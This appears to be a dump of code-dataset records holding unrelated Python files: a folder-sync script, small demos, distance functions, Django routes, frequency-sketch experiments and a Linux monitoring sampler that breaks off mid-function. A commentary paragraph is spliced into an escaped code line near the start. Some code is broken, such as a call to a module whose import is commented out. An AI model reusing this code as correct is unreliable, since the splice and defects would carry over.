self.log_file_name.replace(\".txt\", 
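`merge_folders` above decides to overwrite purely on a strict `st_mtime` comparison. On FAT/exFAT targets, mtimes are stored with roughly 2-second granularity, so `shutil.copy2` cannot always round-trip the source timestamp exactly and unchanged files can be re-copied on every run. A hedged sketch of a tolerant comparison (the 2-second window is an assumption, not something the script currently does):

```python
import os

# Treat the destination as stale only when the source is newer by more than
# `tolerance` seconds, absorbing coarse filesystem timestamp resolution.
def is_newer(src_file, dst_file, tolerance=2):
    return os.stat(src_file).st_mtime > os.stat(dst_file).st_mtime + tolerance
```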
\"-forced.txt\")\n self.error_file_name = self.log_file_name.replace(\".txt\", \"-forced.txt\")\n\n self.log_dir_path = log_dir_path\n self.log_file = open(log_dir_path + self.log_file_name, \"w\")\n self.error_file = None\n\n def log(self, message, visit=False):\n if not visit:\n self.most_recent_action = message\n if not visit or self.log_visits:\n self.log_file.write(message + \"\\n\\n\")\n if self.print_actions:\n print(message)\n\n def log_error(self):\n self.error_file = self.error_file or open(self.log_dir_path + self.error_file_name, \"w\")\n self.error_file.write(traceback.format_exc())\n self.error_file.write(\"\\nError while completing action%s:\\n%s\" %\n (\" (forced mode)\" if self.force_delete else \"\",\n self.most_recent_action))\n\n def error_message(self):\n force_instructions = \"\" if self.force_delete else \"Press retry to rerun in forced mode.\"\n return \"There was an error when syncing folder %s with %s. %s See error.txt for more details. \\n\\n\" \\\n \"Error encountered while {}\".format(source_directory, destination_directory, force_instructions,\n self.most_recent_action.replace(source_directory, \"\")\n .replace(destination_directory, \"\"))\n\n def close(self):\n self.log_file.close()\n if self.error_file:\n self.error_file.close()\n\n\n# Sample usage via cmd\n# \"C:\\Program Files\\Python33\\python.exe\" \"C:\\Users\\Nic\\Documents\\Mine\\Coding\\file-copier\\sync-folders.py\" \"C:\\Users\\Nic\\Documents\\Mine\" \"C:\\Users\\Nic\\Google Drive\\Mine\" log force\n# arguments expected: src_dir dst_dir [log] [force] [actions]\n# log is optional. If present, no actions will be taken: only a log will be produced\n# force is optional. If present, the program will make an attempt to delete or overwrite read-only files if found\n# actions is optional. If present, the program will print its actions to standard output as it goes\n#\nif len(sys.argv) in (range(3, 7)):\n source_directory = sys.argv[1]\n if os.path.exists(source_directory):\n destination_directory = sys.argv[2]\n optional_args = sys.argv[3:]\n\n sync_folders(source_directory, destination_directory,\n log_only='log' in optional_args,\n force_delete='force' in optional_args,\n print_actions='actions' in optional_args,\n log_visits='log_visits' in optional_args or \"visits\" in optional_args\n )\n\n else:\n raise NotADirectoryError(source_directory)\nelse:\n raise SyntaxError(\"Must have 2 arguments: an existing source directory and the desired destination directory. 2 \"\n \"flags are optional.\")\n","sub_path":"sync-folders.py","file_name":"sync-folders.py","file_ext":"py","file_size_in_byte":7899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"435107823","text":"# coding: utf-8\n#########################################################################\n# 网站:
疯狂Java联盟 #\n# author yeeku.H.lee kongyeeku@163.com #\n# #\n# version 1.0 #\n# #\n# Copyright (C), 2001-2018, yeeku.H.Lee #\n# #\n# This program is protected by copyright laws. #\n# #\n# Program Name: #\n# #\n#
Date: #\n#########################################################################\nfrom functools import *\nclass Cell:\n def __init__(self):\n self._alive = False\n # @property装饰器指定该方法可使用属性语法访问\n @property\n def alive(self):\n return self._alive\n def set_state(self, state):\n self._alive = bool(state)\n # 指定set_alive()方法就是将set_state()方法的state参数指定为True\n set_alive = partialmethod(set_state, True)\n # 指定set_dead()方法就是将set_state()方法的state参数指定为False\n set_dead = partialmethod(set_state, False)\nc = Cell()\nprint(c.alive)\n# 相当于调用c.set_state(True)\nc.set_alive()\nprint(c.alive)\n# 相当于调用c.set_state(False)\nc.set_dead()\nprint(c.alive)","sub_path":"官方配套代码/10/10.9/partialmethod_test.py","file_name":"partialmethod_test.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"249462108","text":"#!/bin/env python\n# -*- coding:utf-8 -*-\n'''\n Get the linux os IP address\n'''\nimport os\nimport re\n\n\ndef getip():\n '''\n Get the linux os IP address\n '''\n result = os.popen('ip addr')\n result = result.read()\n #过滤IP地址,生成IP地址列表\n all_ip = re.findall(r\"inet\\s(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})\", result)\n\n #过滤掉127.0.0.1地址,并取第一个非127开头的地址作为返回值\n for _ip in all_ip:\n if not _ip.startswith('127'):\n return _ip\n #没有找到非127开头的IP地址,返回本机地址127.0.0.1\n return \"127.0.0.1\"\n","sub_path":"flasky/GetIP.py","file_name":"GetIP.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"337323848","text":"# %%\nimport matplotlib.pyplot as plt\nfrom numpy import random\nfrom math import sqrt\n\ndef inverseBetaCDF(u):\n return 1 - sqrt(1 - u)\n\nfig = plt.figure()\nax1 = fig.add_subplot(2, 1, 1)\nax2 = fig.add_subplot(2, 1, 2)\n\nu = random.rand(100000)\nax1.hist(u, range=(0.0, 1.0), density=True, bins=10)\nax1.set_ylabel('density')\nax1.set_xlabel('u')\n\nx = list(map(inverseBetaCDF, u))\nax2.hist(x, range=(0.0, 1.0), density=True, bins=10)\nax2.set_ylabel('density')\nax2.set_xlabel('x')\n# %%\n","sub_path":"beta-sample.py","file_name":"beta-sample.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"543249388","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals\nfrom gaebusiness.business import CommandExecutionException\nfrom tekton.gae.middleware.json_middleware import JsonResponse\nfrom chamada_app import chamada_facade\n\n\ndef index():\n cmd = chamada_facade.list_chamadas_cmd()\n chamada_list = cmd()\n chamada_form = chamada_facade.chamada_form()\n chamada_dcts = [chamada_form.fill_with_model(m) for m in chamada_list]\n return JsonResponse(chamada_dcts)\n\n\ndef new(_resp, **chamada_properties):\n cmd = chamada_facade.save_chamada_cmd(**chamada_properties)\n return _save_or_update_json_response(cmd, _resp)\n\n\ndef edit(_resp, id, **chamada_properties):\n cmd = chamada_facade.update_chamada_cmd(id, **chamada_properties)\n return _save_or_update_json_response(cmd, _resp)\n\n\ndef delete(_resp, id):\n cmd = chamada_facade.delete_chamada_cmd(id)\n try:\n cmd()\n except CommandExecutionException:\n _resp.status_code = 500\n return JsonResponse(cmd.errors)\n\n\ndef _save_or_update_json_response(cmd, _resp):\n try:\n chamada = cmd()\n except CommandExecutionException:\n _resp.status_code = 500\n return JsonResponse(cmd.errors)\n chamada_form = chamada_facade.chamada_form()\n return 
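The `inverseBetaCDF` sampler in beta-sample.py above is inverse-transform sampling: for the Beta(1, 2) density f(x) = 2(1 - x) on [0, 1], the CDF is F(x) = 1 - (1 - x)^2, and solving u = F(x) gives x = 1 - sqrt(1 - u). A quick self-check under those formulas:

```python
from math import sqrt
from numpy import random

def inverseBetaCDF(u):
    return 1 - sqrt(1 - u)

# F(inverseBetaCDF(u)) should give back u, and the sample mean of Beta(1, 2)
# is a / (a + b) = 1 / 3.
assert abs((1 - (1 - inverseBetaCDF(0.75)) ** 2) - 0.75) < 1e-12
xs = [inverseBetaCDF(u) for u in random.rand(100000)]
print(sum(xs) / len(xs))  # roughly 0.333
```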
JsonResponse(chamada_form.fill_with_model(chamada))\n\n","sub_path":"backend/appengine/routes/chamadas/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"36557390","text":"import numpy as np\nimport pandas as pd\n\n#definisco qui la distanza:\ndef normalized_euclidean_distance(x, y):\n return 0.5 * np.var(x - y) / (np.var(x) + np.var(y))\n\ndef simple_match_distance(x, y):\n count = 0\n for xi, yi in zip(x, y):\n if xi == yi:\n count += 1\n sim_ratio = 1.0 * count / len(x)\n return 1.0 - sim_ratio\n\n\ndef normalized_square_euclidean_distance(ranges):\n def actual(x, y, xy_ranges):\n return np.sum(np.square(np.abs(x - y) / xy_ranges))\n return lambda x, y: actual(x, y, ranges)\n\n\ndef mad_distance(x, y, mad):\n val = 0.0\n for i in range(len(mad)):\n # print i, 0.0 if mad[i] == 0.0 else 1.0 * np.abs(x[i] - y[i]) / mad[i]\n # print i, np.abs(x[i] - y[i]) / mad[i]\n # val += 0.0 if mad[i] != 0 else 1.0 * np.abs(x[i] - y[i]) / mad[i]\n val += 0.0 if mad[i] == 0.0 else 1.0 * np.abs(x[i] - y[i]) / mad[i]\n # print val\n return val\n\n\ndef mixed_distance(x, y, discrete, continuous, classes_name, ddist, cdist):\n # type: (pandas.Series, pandas.Series, list, list, list, function, function) -> double\n \"\"\"\n This function return the mixed distance between instance x and instance y\n :param x: pandas.Series, instance 1\n :param y: pandas.Series, instance 2\n :param discrete: list of str, column names containing categorical variables\n :param continuous: list of str, column names containing non categorical variables\n :param classes_name: list of str, array of column names containing the label\n :param ddist: function, distance function for discrete variables\n :param cdist: function, distance function for continuos variables\n :return: double\n \"\"\"\n xd = [x[att] for att in discrete if att not in classes_name]\n wd = 0.0\n dd = 0.0\n if len(xd) > 0:\n yd = [y[att] for att in discrete if att not in classes_name]\n wd = 1.0 * len(discrete) / (len(discrete) + len(continuous))\n dd = ddist(xd, yd)\n\n xc = np.array([x[att] for att in continuous if att not in classes_name])\n wc = 0.0\n cd = 0.0\n if len(xc) > 0:\n yc = np.array([y[att] for att in continuous if att not in classes_name])\n wc = 1.0 * len(continuous) / (len(discrete) + len(continuous))\n cd = cdist(xc, yc)\n\n return wd * dd + wc * cd\n\n\ndef sorted_distances_df(X2E, i2e, discrete_var, continuous_var, classes_name,label_distance='distance'):\n \"\"\"\n This function returns the neighours of the instance sorted by closeness,\n the distance metric used is `mixed_distance()`\n\n :param X2E: dataframe, each row is an instance and the label was given by the black box, should NOT contain column(s) with labels\n :param i2e: pd.Series, instance to be explained\n :param discrete_var: array of str, names of X2E columns containing discrete features\n :param continuous_var: array of str, names of X2E columns containing continuous features\n :param class_name: array of str, name(s) of the column(s) containing the label\n :return: pandas dataframe\n \"\"\"\n indexes_values = X2E.index.values\n # distance between instance to explain and other instances\n distances = [mixed_distance(i2e,X2E.loc[i],discrete=discrete_var,continuous=continuous_var,classes_name=classes_name,ddist=simple_match_distance,cdist=normalized_euclidean_distance) for i in indexes_values]\n output = 
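`mixed_distance` above weights the categorical and continuous parts by their share of the feature count (wd + wc = 1). A hedged usage sketch, assuming the module's own `mixed_distance`, `simple_match_distance` and `normalized_euclidean_distance` are in scope; the feature names are made up for illustration:

```python
import pandas as pd

x = pd.Series({'color': 'red', 'age': 30.0, 'income': 50.0, 'label': 1})
y = pd.Series({'color': 'blue', 'age': 32.0, 'income': 48.0, 'label': 0})

# One discrete and two continuous features -> weights 1/3 and 2/3.
d = mixed_distance(
    x, y,
    discrete=['color'],
    continuous=['age', 'income'],
    classes_name=['label'],
    ddist=simple_match_distance,
    cdist=normalized_euclidean_distance,
)
print(d)
```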
X2E.reset_index().rename(columns={'index':'old_index_'+label_distance})#.drop('index',1)\n output[label_distance] = pd.Series(distances)\n output = output.sort_values(by=label_distance,ascending=True).reset_index().drop('index',1)\n \n return output\n","sub_path":"multilabelexplanations/multilabelexplanations/distance_functions.py","file_name":"distance_functions.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"223554161","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('drawmatch', views.drawmatch, name='drawmatch'),\n path('drawmatch_backend', views.drawmatch_backend, name='drawmatch_backend'),\n path('generate_pdf', views.generate_pdf, name='generate_pdf'),\n path('genpdf_backend', views.genpdf_backend, name='genpdf_backend') ,\n path('record_score', views.record_score, name='record_score'),\n path('record_score_backend', views.record_score_backend, name='record_score_backend'),\n path('view_players', views.view_players, name='view_players'),\n path('add_player', views.add_player, name='add_player'),\n path('view_player', views.view_player, name='view_player'),\n path('edit_player', views.edit_player, name='edit_player'),\n path('edit_player_backend', views.edit_player_backend, name='edit_player_backend'),\n path('delete_player', views.delete_player, name='delete_player'),\n path('success', views.success, name='success'),\n path('fail', views.fail, name='fail'),\n path('match_history', views.match_history, name='match_history'),\n path('edit_schedule', views.edit_schedule, name='edit_schedule'),\n path('save_schedule', views.save_schedule, name='save_schedule'),\n path('view_schedule', views.view_schedule, name='view_schdeule'),\n path('delete_schedule', views.delete_schedule, name='delete_schedule'),\n path('delete_match', views.delete_match, name='delete_match'),\n path('delete_match_enter_score', views.delete_match_enter_score, name='delete_match_enter_score'),\n path('edit_match_enter_score', views.edit_match_enter_score, name='edit_match_enter_score'),\n path('edit_match_enter_score_backend', views.edit_match_enter_score_backend, name='edit_match_enter_score_backend'),\n path('list_draw', views.list_draw, name='list_draw')\n]\n","sub_path":"squashApp/squash_draw/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"434328997","text":"import numpy as np\nimport random as rd\nimport math\nimport statistics\nimport matplotlib.pyplot as plt\n\nM = 100\nN = 100000\nA = 5\nB = 10\n\ndef gen_uniform():\n\ta = []\n\tfor i in range(N):\n\t\ta.append(rd.randint(0, M - 1))\n\treturn a\n\ndef gen_exponential():\n\ta = np.random.exponential(1 / math.log(2, math.exp(1)), N)\n\ta = [int(i) for i in a]\n\treturn a\n\ndef get_summary(a):\n\tb = {}\n\tfor i in range(len(a)):\n\t\tif b.get(a[i]) == None:\n\t\t\tb[a[i]] = 1\n\t\telse:\n\t\t\tb[a[i]] = b[a[i]] + 1\n\treturn b\n\ndef check_prime(x):\n\tfor i in range(2, int(np.sqrt(x)) + 1):\n\t\tif x % i == 0:\n\t\t\treturn False\n\treturn True\n\ndef get_prime(x):\n\twhile check_prime(x) == False:\n\t\tx = x + 1\n\treturn x\n\ndef gen_hash():\n\th = []\n\tp = get_prime(B)\n\tfor i in range(A):\n\t\th.append((rd.randint(1, p - 1), rd.randint(0, p - 1)))\n\treturn h, p\n\ndef algo1(a, b, h, p):\n\tc = np.zeros((A, B)).astype(int)\n\tfor element in a:\n\t\tfor i 
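`gen_hash` above draws pairs (a, b) with a != 0 modulo a prime p >= B, i.e. the Carter-Wegman 2-universal family h(x) = ((a*x + b) mod p) mod B shared by all three sketch algorithms. For distinct keys the collision probability over a random (a, b) is at most about 1/B, which a brute-force count confirms for small parameters:

```python
# Exhaustive collision count for h(x) = ((a*x + b) % p) % B with x != y.
p, B = 11, 10
x, y = 3, 7
collisions = sum(
    ((a * x + b) % p) % B == ((a * y + b) % p) % B
    for a in range(1, p) for b in range(p)
)
print(collisions / ((p - 1) * p))  # ~0.018 here, comfortably below 1/B = 0.1
```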
in range(A):\n\t\t\ttemp = ((h[i][0] * element + h[i][1]) % p) % B\n\t\t\tc[i][temp] = c[i][temp] + 1\n\ts = {}\n\tfor key in b.keys():\n\t\tl = []\n\t\tfor i in range(A):\n\t\t\ttemp = ((h[i][0] * key + h[i][1]) % p) % B\n\t\t\tl.append(c[i][temp])\n\t\ts[key] = statistics.median(l)\n\treturn s\n\ndef algo2(a, b, h, p):\n\tc = np.zeros((A, B)).astype(int)\n\tfor element in a:\n\t\tfor i in range(A):\n\t\t\ttemp = ((h[i][0] * element + h[i][1]) % p) % B\n\t\t\tc[i][temp] = c[i][temp] + 1\n\ts = {}\n\tfor key in b.keys():\n\t\tl = []\n\t\tfor i in range(A):\n\t\t\ttemp = ((h[i][0] * key + h[i][1]) % p) % B\n\t\t\tif temp % 2 == 0:\n\t\t\t\tl.append(c[i][temp] - c[i][temp + 1])\n\t\t\telse:\n\t\t\t\tl.append(c[i][temp] - c[i][temp - 1])\n\t\ts[key] = statistics.median(l)\n\treturn s\n\ndef algo3(a, b, h, p):\n\tc = np.zeros((A, B)).astype(int)\n\tfor element in a:\n\t\tfor i in range(A):\n\t\t\ttemp = ((h[i][0] * element + h[i][1]) % p) % B\n\t\t\tc[i][temp] = c[i][temp] + 1\n\ts = {}\n\tfor key in b.keys():\n\t\tl = []\n\t\tfor i in range(A):\n\t\t\ttemp = ((h[i][0] * key + h[i][1]) % p) % B\n\t\t\tl.append(c[i][temp])\n\t\ts[key] = min(l)\n\treturn s\n\ndef plot_diff(b, s):\n\tb1 = sorted(b.items())\n\ts1 = sorted(s.items())\n\tr = []\n\tsum = 0\n\tfor i in range(len(b1)):\n\t\tr.append((b1[i][0], s1[i][1] / b1[i][1] - 1))\n\t\tsum = sum + np.abs(s1[i][1] / b1[i][1] - 1)\n\tprint(sum / len(b1))\n\tx, y = zip(*r)\n\tplt.plot(x, y)\n\tplt.show()\n\ndef main():\n\tu = gen_uniform()\n\tb = get_summary(u)\n\th, p = gen_hash()\n\ts1 = algo1(u, b, h, p)\n\ts2 = algo2(u, b, h, p)\n\ts3 = algo3(u, b, h, p)\n\tplot_diff(b, s1)\n\tplot_diff(b, s2)\n\tplot_diff(b, s3)\n\n\te = gen_exponential()\n\tb = get_summary(e)\n\th, p = gen_hash()\n\ts1 = algo1(e, b, h, p)\n\ts2 = algo2(e, b, h, p)\n\ts3 = algo3(e, b, h, p)\n\tplot_diff(b, s1)\n\tplot_diff(b, s2)\n\tplot_diff(b, s3)\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"1a CS5234/Week6/Problem Set 6/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"638076015","text":"# Problem: Implement Fizz Buzz\n# What is fizz buzz?\n## Return the string representation of numbers from 1 to n\n## Multiples of 3 -> 'Fizz'\n## Multiples of 5 -> 'Buzz'\n## Multiples of 3 and 5 -> 'FizzBuzz'\n\n\ndef fizz_buzz(num):\n s = [\"Fizz\",\"Buzz\",\"FizzBuzz\"]\n count = 5;\n if (num is None) or (num<1):\n raise Exception\n for i in range(1,num+1):\n if (i%3==0):\n count = 0;\n if (i%5==0):\n count = 1;\n if (i%3==0 and i%5==0):\n count = 2;\n if (count==5):\n print (i)\n count = 5\n continue\n print (\"count: \"+str(count))\n print (s[count])\n count = 5\n \n##fizz_buzz(15)\n\ndef fizz_buzz2(num):\n if (num is None) or (num<1):\n raise Exception\n for i in range(1,num+1):\n if i%3==0 and i%5==0:\n print (\"FizzBuzz\")\n continue\n if i%3==0:\n print (\"Fizz\")\n continue\n if i%5==0:\n print (\"Buzz\")\n continue\n print (i)\n \nfizz_buzz2(15)\n \n \n","sub_path":"Arrays and Strings/FizzBuzz.py","file_name":"FizzBuzz.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"207113875","text":"#########################################\n# Function: sample linux performance indices\n# Usage: python sampler.py\n# Author: AIHC DEV TEAM\n# Company: AsiaInfo Inc.\n# Version: 2.2\n#########################################\n\nimport os\nimport 
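For orientation, the three estimators in counter.py above are classic frequency sketches: algo1 takes the median of counters (Count-Median), algo2 subtracts a paired bucket before the median (a Count-Sketch-style bias correction), and algo3 takes the minimum (Count-Min). Count-Min never undercounts, since each row's bucket holds the true count plus nonnegative collision mass; by Markov's inequality the excess in one row exceeds 2N/B with probability at most 1/2, so the min over A rows exceeds it with probability at most 2^-A. A hedged property check, reusing the functions defined above:

```python
# Assumes gen_uniform, get_summary, gen_hash and algo3 from counter.py.
a = gen_uniform()          # the stream
summary = get_summary(a)   # exact frequencies
h, p = gen_hash()
est = algo3(a, summary, h, p)
assert all(est[k] >= summary[k] for k in summary)  # Count-Min never undercounts
```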
os.path\nimport sys\nimport time\nimport datetime\nimport operator\nimport httplib\nimport logging\nimport socket\nimport random\nimport json\nfrom shutil import copyfile\nfrom subprocess import Popen, PIPE\nfrom logging.handlers import RotatingFileHandler\n\n# import ksql\n\nglobal logger\n# REMOTE_HOST = None\n# REMOTE_PORT = None\n# REMOTE_MONITOR_URI = None\n# UUID = None\nglobal roboter\n\n\ndef getIoFilter():\n disks = roboter.getConfigVal(\"disks\")\n if disks:\n arr = disks.split(',')\n str = \"\\\"||$1==\\\"\".join(arr)\n str = \"awk 'NULL==\\\"\" + str + \"\\\"'\"\n return str\n else:\n return None\n\n\ndef getNetWorks():\n networks = roboter.getConfigVal(\"ethernet\")\n if networks:\n return networks.split(',')\n else:\n return None\n\n\n# IFNAME = roboter.getConfigVal(\"ethernet\")\nIO_FILTER = getIoFilter()\n\n\n# IO_FILTER = \"awk 'NULL==\\\"sda\\\"'\"\n\ndef get_disk_partition():\n fileSystems = roboter.getConfigVal(\"fileSystems\").split(',')\n if fileSystems:\n return fileSystems\n else:\n return None\n\n\ndef get_mem_usage_percent():\n f = open('/proc/meminfo', 'r')\n for line in f:\n if line.startswith('MemTotal:'):\n mem_total = int(line.split()[1])\n elif line.startswith('MemFree:'):\n mem_free = int(line.split()[1])\n elif line.startswith('Buffers:'):\n mem_buffer = int(line.split()[1])\n elif line.startswith('Cached:'):\n mem_cache = int(line.split()[1])\n elif line.startswith('SwapTotal:'):\n m_total = int(line.split()[1])\n elif line.startswith('SwapFree:'):\n m_free = int(line.split()[1])\n else:\n continue\n f.close()\n physical_percent = usage_percent(mem_total - (mem_free + mem_buffer + mem_cache), mem_total)\n virtual_percent = 0\n if m_total > 0:\n virtual_percent = usage_percent((m_total - m_free), m_total)\n return physical_percent, virtual_percent, int(usage_unit(mem_total, 2)), usage_unit(\n mem_total - mem_free - mem_buffer - mem_cache, 2)\n\n\nblack_list = ('iso9660',)\n\n\ndef usage_unit(use, times):\n try:\n division = 1024\n count = 1\n while (count < times):\n count = count + 1\n division = division * 1024\n ret = use / division\n except ZeroDivisionError:\n raise Exception(\"ERROR - zero division error\")\n return float('%0.2f' % ret)\n\n\ndef usage_percent(use, total):\n try:\n ret = (float(use) / total) * 100\n except ZeroDivisionError:\n raise Exception(\"ERROR - zero division error\")\n return float('%0.2f' % ret)\n\n\ndef check_disk():\n try:\n return_dict = {}\n p_list = get_disk_partition()\n\n if not p_list:\n return None\n\n for i in p_list:\n dt = os.statvfs(i)\n use = (dt.f_blocks - dt.f_bfree) * dt.f_frsize\n all = dt.f_blocks * dt.f_frsize\n return_dict[i] = ('%.2f' % (usage_percent(use, all),), ('%.2f' % (all * 1.0 / (1024 * 1000000))))\n except:\n return None\n return return_dict\n\n\n_CLOCK_TICKS = os.sysconf(\"SC_CLK_TCK\")\n\n\ndef get_cpu_time():\n need_sleep = True\n if not os.path.isfile('../tmp/cpu_stat') or os.path.getsize('../tmp/cpu_stat') == 0:\n copyfile('/proc/stat', '../tmp/cpu_stat')\n need_sleep = True\n\n f1 = open('../tmp/cpu_stat', 'r')\n values1 = f1.readline().split()\n total_time1 = 0\n for i in values1[1:]:\n total_time1 += int(i)\n idle_time1 = int(values1[4])\n iowait_time1 = int(values1[5])\n f1.close()\n\n if need_sleep:\n time.sleep(1)\n\n f2 = open('/proc/stat', 'r')\n\n values2 = f2.readline().split()\n total_time2 = 0\n for i in values2[1:]:\n total_time2 += int(i)\n idle_time2 = int(values2[4])\n iowait_time2 = int(values2[5])\n\n f2.close()\n\n idle_time = idle_time2 - idle_time1\n iowait_time = 
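The busy percentage in `get_cpu_time` above is computed from deltas of /proc/stat jiffy counters over the sampling window: (delta_total - delta_idle - delta_iowait) / delta_total. A worked example of the arithmetic with made-up jiffy counts:

```python
# With 400 elapsed jiffies of which 300 were idle and 20 iowait,
# the CPU spent 80 jiffies busy -> 20%.
total, idle, iowait = 400, 300, 20
cpu_percentage = int(100.0 * (total - idle - iowait) / total)
assert cpu_percentage == 20
```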
iowait_time2 - iowait_time1\n total_time = total_time2 - total_time1\n\n cpu_percentage = int(100.0 * (total_time - idle_time - iowait_time) / total_time)\n # compensate logic\n if total_time < 0 or idle_time < 0 or iowait_time < 0 or cpu_percentage < 0 or cpu_percentage > 100:\n time.sleep(1)\n f3 = open('/proc/stat', 'r')\n\n values3 = f3.readline().split()\n total_time3 = 0\n for i in values3[1:]:\n total_time3 += int(i)\n idle_time3 = int(values3[4])\n iowait_time3 = int(values3[5])\n\n f3.close()\n\n idle_time = idle_time3 - idle_time2\n iowait_time = iowait_time3 - iowait_time2\n total_time = total_time3 - total_time2\n cpu_percentage = int(100.0 * (total_time - idle_time - iowait_time) / total_time)\n\n copyfile('/proc/stat', '../tmp/cpu_stat')\n return cpu_percentage\n\n\ndef network_io_kbitps():\n \"\"\"Return network I/O statistics for every network interface\n installed on the system as a dict of raw tuples.\n\n \"\"\"\n list = getNetWorks()\n if not list:\n return None\n f1 = open(\"/proc/net/dev\", \"r\")\n lines1 = f1.readlines()\n f1.close()\n\n # list = ['bond0', 'bond1', 'lo']\n retdict1 = {}\n for line1 in lines1[2:]:\n colon1 = line1.find(':')\n assert colon1 > 0, line1\n name1 = line1[:colon1].strip()\n if list.count(name1):\n fields1 = line1[colon1 + 1:].strip().split()\n bytes_recv1 = float('%.4f' % (float(fields1[0]) * 0.0078125))\n bytes_sent1 = float('%.4f' % (float(fields1[8]) * 0.0078125))\n retdict1[name1] = (bytes_recv1, bytes_sent1)\n\n time.sleep(1)\n f2 = open(\"/proc/net/dev\", \"r\")\n lines2 = f2.readlines()\n f2.close()\n retdict2 = {}\n for line2 in lines2[2:]:\n colon2 = line2.find(':')\n assert colon2 > 0, line2\n name2 = line2[:colon2].strip()\n if list.count(name2):\n fields2 = line2[colon2 + 1:].strip().split()\n bytes_recv2 = float('%.4f' % (float(fields2[0]) * 0.0078125))\n bytes_sent2 = float('%.4f' % (float(fields2[8]) * 0.0078125))\n retdict2[name2] = (bytes_recv2, bytes_sent2)\n\n retdict = merge_with(retdict2, retdict1)\n return retdict\n\n\ndef disk_io_Kbps():\n if not IO_FILTER:\n return None\n iostat = Popen(\"iostat -d -k 1 2 | sed '/Device\\|Linux\\|^$/d' |\" + IO_FILTER + \"> ../tmp/disk_io\", shell=True,\n stdout=PIPE, stderr=PIPE, close_fds=True)\n iostat_error = iostat.communicate()[1].strip()\n if iostat_error:\n logger.error(\"iostat not exists, %s\" % iostat_error)\n return None\n\n retdict = {}\n f = open('../tmp/disk_io', 'r')\n lines = f.readlines()\n for line in lines:\n name, _, readkps, writekps, _, _, = line.split()\n if name:\n readkps = float(readkps)\n writekps = float(writekps)\n retdict[name] = (readkps, writekps)\n f.close()\n return retdict\n\n\ndef merge_with(d1, d2, fn=lambda x, y: tuple(map(operator.sub, x, y))):\n res = d1.copy() # \"= dict(d1)\" for lists of tuples\n for key, val in d2.iteritems(): # \".. 
in d2\" for lists of tuples\n try:\n res[key] = fn(res[key], val)\n except KeyError:\n res[key] = val\n return res\n\n\ndef get_load():\n try:\n f = open('/proc/loadavg', 'r')\n tmp = f.readline().split()\n lavg_1 = float(tmp[0])\n lavg_5 = float(tmp[1])\n lavg_15 = float(tmp[2])\n f.close()\n except:\n return None\n return lavg_1, lavg_5, lavg_15\n\n\ndef get_tcp_status():\n check_cmd = \"command -v ss\"\n check_proc = Popen(check_cmd, shell=True, stdout=PIPE, close_fds=True)\n ss = check_proc.communicate()[0].rstrip('\\n')\n if ss:\n cmd = \"ss -ant | awk '{if(NR != 1) print NULL}' | awk '{state=NULL;arr[state]++} END{for(i in arr){printf \\\"%s=%s \\\", i,arr[i]}}' | sed 's/-/_/g' | sed 's/ESTAB=/ESTABLISHED=/g' | sed 's/FIN_WAIT_/FIN_WAIT/g'\"\n else:\n cmd = \"netstat -anp | grep tcp | awk '{print NULL}' | awk '{state=NULL;arr[state]++} END{for(i in arr){printf \\\"%s=%s \\\", i,arr[i]}}' | tail -n 1\"\n tcp_proc = Popen(cmd, shell=True, stdout=PIPE, close_fds=True)\n tcp_status = tcp_proc.communicate()[0].rstrip('\\n')\n return tcp_status\n\n\ndef get_proc_number():\n cmd = \"ps axu | wc -l | tail -n 1\"\n proc_func = Popen(cmd, shell=True, stdout=PIPE, close_fds=True)\n proc_number = proc_func.communicate()[0].rstrip('\\n')\n return proc_number\n\n\ndef all_index():\n return (\n int(time.time() * 1000),\n get_cpu_time(),\n get_mem_usage_percent(),\n check_disk(),\n disk_io_Kbps(),\n network_io_kbitps(),\n get_load(),\n # get_tcp_status(),\n get_proc_number()\n )\n\n\ndef get_local_ip(ifname):\n import fcntl, struct\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n inet = fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', ifname[:15]))\n return socket.inet_ntoa(inet[20:24])\n\n\ndef get_cpu_forecast():\n # node_id = roboter.getNodeId()\n node_id = '167898152'\n threeDayAgo = (datetime.datetime.now() - datetime.timedelta(days=3))\n timeStamp = int(time.mktime(threeDayAgo.timetuple()) * 1000)\n client = ksql.KSQLAPI('http://10.1.236.40:8099')\n query = client.query(\n \"select TIMESTAMP,FORECAST,STDDEV from PM_HOST_CPU_PREDICTED where ROWKEY = '%s' and Windowstart >= %s\" % (\n node_id, timeStamp))\n query_result = ''\n for items in query:\n query_result = query_result + items\n\n results = json.loads(query_result)\n forecast_result = {}\n for item in results:\n if item.has_key('row'):\n result = item.values()\n forecast_result[\"timestamp\"] = result[0]['columns'][0]\n forecast_result[\"forecast\"] = result[0]['columns'][1]\n f = result[0]['columns'][2]\n a = '%.1f' % f\n forecast_result[\"stddev\"] = a\n\n return forecast_result\n\n\ndef collector():\n timestamp, cpu, mem, disk, disk_io, net, load, process_number = all_index()\n disk_utilization = ''\n disk_io_read = ''\n disk_io_write = ''\n internet_networkrx = ''\n internet_networktx = ''\n tcp_status_count = ''\n 